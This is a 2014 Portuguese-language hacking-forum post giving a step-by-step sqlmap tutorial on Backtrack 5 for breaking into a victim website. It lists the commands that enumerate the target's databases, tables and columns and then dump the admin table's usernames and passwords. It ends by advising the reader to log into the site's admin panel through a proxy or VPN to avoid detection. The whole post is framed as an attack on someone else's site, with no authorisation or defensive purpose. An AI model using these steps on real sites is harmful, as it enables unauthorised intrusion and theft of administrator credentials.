Unk3n0w7 1,321 Posted June 11, 2014 No meu tutorial anterior expliquei o que é Backtrack , agora neste tutorial eu vou encinar como hackear site usando Backtrack 5 (SqlMap). SqlMap é uma ferramenta de injeção de SQL automático que ajuda você a hackear site facilmente. Siga os passos simples para hackear site usando BackTrack 5 ferramenta de SqlMap. 1. Abra o terminal e digite backtrack cd /pentest/database/sqlmap e aperte enter. 2. Agora, encontrar o site vulnerável. (Bom, eu já tenho um site vulnerável) 3. Agora digite este comando no terminal e aperte enter. (Ver figura acima) Codigo : python sqlmap.py -u http://sitedavitima'slink/index.php?id=4 –dbs Agora você vai ter o nome do banco de dados do site Bem, eu tenho a aj database de dados e information_schema vamos selecionar dados aj. 5. Agora pegue as tabelas de database. para isso você precisa digitar esse comando em seu terminal e simplesmente pressione Enter. python sqlmap.py -u http://sitedavitima'slink/index.php?id=4 -D (database name) –tables Agora precisamos pegar as tabelas do database aj. cole este comando comando abaixo e pressione Enter. python sqlmap.py -u http://www.sitedavitima'slink.com/index.php?id=4 -D aj –tables Agora você terá a lista de tabelas que é armazenado no database aj. Agora vamos pegar as colunas da tabela do administrador python sqlmap.py -u http://www.sitedavitima'slink.com/index.php?id=4 -T admin --columns Agora temos as colunas e temos nome de usuário e senha 9. Agora vamos pegar as senhas do administrador python sqlmap.py -u http://www.sitedavitima'slink.com/index.php?id=4 -T admin -U test --dump Agora temos o nome de usuário ea senha do site! Agora é só encontrar o painel administrador do site e usar o proxy / vpn quando você está tentando fazer o login no site como um administrador. Créditos : SKHackers 1 V¡®u§ reacted to this Share this post Link to post Share on other sites
